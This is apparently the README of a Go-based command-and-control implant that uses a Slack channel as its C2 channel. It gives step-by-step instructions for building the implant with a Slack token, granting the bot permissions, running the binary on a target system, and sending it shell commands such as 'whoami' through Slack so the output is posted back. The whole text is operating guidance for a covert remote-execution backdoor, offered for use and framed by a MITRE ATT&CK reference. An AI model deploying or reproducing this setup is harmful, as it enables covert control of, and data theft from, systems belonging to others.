Slack C2bot that executes commands and returns the output.

Learn more by reading our full writeup: Using Slack as a Malicious C2 Vector: MITRE ATT&CK – Web Service (T1102)

Install Golang and requirements:

sudo apt install golang-go
sudo apt install git

Install the Slack library:

go get "github.com/nlopes/slack"

./build.sh [$CHANID] [$SLACKTOKEN]

The build script will generate a UUID for your bot.

If you dont already have a workspace you will need to create one.

Once you have a workspace, open a channel and note the channel id. This can be found by opening the channel in your browser. The uri is /messages/channelid/.

Save this as $CHANID.

Next, you will need to add a bot to your workspace. This can be done using the following steps:

• Open https://api.slack.com/
• Click Start building. Enter the name of the bot and the workspace.
• On the left menu listing, click: OAuth & Permissions
• Scroll down to Scopes. Add channels:history and chat:write:bot permissions.
• Click save.
• Scroll to the top of the page and click Install App to Workspace.
• Click authorize on the new popup.

Slack OAuth Token. This can be found by opening Your Apps -> Click the bot -> OAuth & Permissions.

Save this as $SLACKTOKEN.

Run the build script.

./build.sh $CHANID $SLACKTOKEN

Run the Slack c2 bot on the target system.

./output/lin_implant.bin

Open the Slack channel.

After the bot checks-in, you can task the bot to execute a command using the following syntax:

[UUID] run whoami

The bot will post the output.